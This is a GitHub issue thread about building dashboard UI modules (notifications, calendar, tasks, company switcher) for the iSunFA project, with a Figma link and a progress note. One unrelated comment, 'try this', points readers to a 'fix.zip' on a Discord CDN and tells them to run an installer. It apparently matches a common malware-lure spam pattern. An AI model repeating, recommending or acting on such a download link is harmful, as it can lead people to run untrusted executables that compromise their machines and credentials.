### ISSUE TITLE
[UI] Module-Dashboard

### ISSUE THREAD

**Issue by StrawHo** [CAFECA-IO/iSunFA#2266]
根據Wireframe內容製作 Dashboard所需Module。

- [x] 快速檢視區
- [x] 系統通知跑馬燈
- [x] 最新消息
- [x] 未完成任務
- [x] 行事曆
- [x] 切換公司

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by StrawHo** [comment]
LINK:
https://www.figma.com/design/qSOAuNX7hxVQaKD51ghONu/iSunFA-Mockup-(Beta)?node-id=1-478&t=8kC48XTPRrhqE15u-1

- 行事曆部分與後端討論，結合連結google or ios 自身行事曆進行串接。(介面這邊新增的部分為 未綁定行事曆的樣式)

花費時間 約6hr45min。Done!
